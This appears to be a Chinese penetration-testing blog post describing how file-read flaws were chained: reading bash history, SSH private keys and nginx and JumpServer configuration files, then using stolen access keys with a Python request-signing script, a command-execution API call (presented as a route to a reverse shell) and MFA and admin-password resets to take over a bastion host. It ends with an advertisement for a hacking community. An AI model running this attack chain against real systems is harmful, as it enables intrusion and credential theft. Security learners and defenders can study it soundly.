【2025版】最新渗透测试 | 文件读取漏洞实战利用，从零基础到精通，收藏这篇就够了！

本文链接：https://blog.youkuaiyun.com/Python_0011/article/details/145730477

作者：subjcw

0x1 Nginx配置文件利用

第一处文件读取，严格来讲是SSRF（CVE-2021-27905），不过java环境下的SSRF利用有限，端口也只开放了443

读取/root/.bash_history

翻历史命令发现这台主机上有tomcat和nginx，tomcat也没办法利用，于是把目光转向nginx

读取nginx配置文件，获取了多个URL路由信息，分别对应不同的接口或应用

其中有一个管理后台，通过XFF来过滤请求

添加XFF字段，访问到管理后台，弱口令拿下

===

0x2 Jumpserver AccessKey利用

第二个依旧是nginx的场景，多个域名解析到同一个IP，根据域名分发到不同的后端服务。

读取/root/.bash_history，历史命令比较多，能看出来是经常使用的，还有多个ssh的公私钥

拼接路径，拿到SSH公私钥

读取/root/.ssh/authorized_keys可以发现获取到的公私钥与目标服务器的公钥匹配

尝试SSH直接登陆。多地ping了一下发现不是CDN，对目标的IP全端口扫描，发现SSH开在一个高端口，但是很遗憾登不上。这个SSH是Nginx服务器的，并不是漏洞所在的服务器。

但是刚刚读authorized_keys和history的时候发现目标服务器部署了jumpserver，并且自身在jumpserver的管理范围内。

查看收集到的资产，确实有一个jumpserver相关域名，解析IP与当前目标服务器为同一IP。现在就看能否获取jumpserver控制台权限。

读取jumpserver配置文件/opt/jumpserver/config/config.txt，可以获取一些敏感信息如数据库、redis密码，但是jumpserver是容器化部署，没办法直接连上。

除此之外就是SECRET_KEY和BOOTSTRAP_TOKEN

看一下jumpserver官方文档中的说明

参数说明 - JumpServer 文档

SECRET_KEY=****           # 用来加密解密的 KEY  
BOOTSTRAP_TOKEN=****      # koko/lion 用来向jms注册使用的 token  
ACCESS_KEY_FILE=data/keys/.access_key  # ACCESS KEY 保存的地址, 默认注册后会保存到该文件中

获取之后可以通过脚本调用接口

jumpserver在jms_core容器中提供了命令行工具用于管理员管理用户，可以修改密码、清除MFA，也就是说只要获取jms_core容器权限，就可以重置Web管理员密码

看一下python示例，通过使用KeyID和SecretID对请求方法、URL、accept、date进行签名。

import requests, datetime, json  
from httpsig.requests_auth import HTTPSignatureAuth  
  
def get_auth(KeyID, SecretID):  
    signature_headers = ['(request-target)', 'accept', 'date']  
    auth = HTTPSignatureAuth(key_id=KeyID, secret=SecretID, algorithm='hmac-sha256', headers=signature_headers)  
    return auth  
  
response = requests.get(url, auth=auth, headers=headers)

也就是说，只要保持请求方法、URL、accept、date不变，签名是可以重用的，可以简单写个python脚本获取sign，将burp作为上级代理捕获数据包后再手动调试数据包

JMS_URL = ''   
X_JMS_ORG = ''  
KEY_ID = ''  
SECRET_ID = ''  
headers = {  
        'Accept': 'application/json',  
        'X-JMS-ORG': X_JMS_ORG,  
        'Date': datetime.now(timezone.utc).strftime('%a, %d %b %Y %H:%M:%S GMT')  
    }  
  
def get_auth():  
    signature_headers = ['(request-target)', 'accept', 'date']  
    auth = HTTPSignatureAuth(key_id=KEY_ID, secret=SECRET_ID, algorithm='hmac-sha256', headers=signature_headers)  
    return auth  
  
def get_request(url):  
    auth = get_auth()  
    full_url = f"{JMS_URL}{url}"  
    print(full_url)  
    response = requests.get(full_url, auth=auth, headers=headers, verify=False)  
    response = requests.post(full_url, auth=auth, headers=headers, data=None, verify=False)  
    print(response.text)

读取jumpserver的accesskey

获取主机列表，这里可以读取/etc/hostname确认jumpserver的主机名，找到对应的主机id

GET /api/v1/assets/assets/?offset\=0&amp;limit\=15&amp;display\=1&amp;draw\=1

反弹shell，返回包中包含执行结果的url /api/v1/ops/celery/task//log/

POST /api/v1/ops/command-executions/ HTTP/2  
Host:   
User-Agent: python-requests/2.31.0  
Accept: application/json  
Date:   
Content-Length:   
Content-Type: application/x-www-form-urlencoded  
Authorization: Signature   
  
hosts=&amp;run_as=&amp;command=

根据官方文档重置管理员密码，如果存在OTP同样可以通过manage.py进行重置。如果管理员开启了强制OTP，重置之后可以在登录后重新绑定。

user.mfa_level='0'  
user.otp_secret_key=''

最后以admin登录jumpserver控制台，接管堡垒机。

===

0x3 思路总结

文件读取漏洞在攻防场景下的影响比较有限，但是可以利用文件读取获取历史命令、私钥文件、配置文件等进一步攻击其他服务，继而获取权限或者数据。

0x4 内部圈子详情介绍

我们是_神农安全，点赞 + 在看_ 铁铁们点起来，最后祝大家都能心想事成、发大财、行大运。

内部圈子介绍

圈子专注于更新src/红蓝攻防相关：

1、维护更新src专项漏洞知识库，包含原理、挖掘技巧、实战案例``2、知识星球专属微信“小圈子交流群”``3、微信小群一起挖洞``4、内部团队专属EDUSRC证书站漏洞报告``5、分享src优质视频课程（企业src/EDUSRC/红蓝队攻防）``6、分享src挖掘技巧tips``7、不定期有众测、渗透测试项目（一起挣钱）``8、不定期有工作招聘内推（工作/护网内推）``9、送全国职业技能大赛环境+WP解析（比赛拿奖）

内部圈子****专栏介绍

知识星球内部共享资料截屏详情如下

（只要没有特殊情况，每天都保持更新）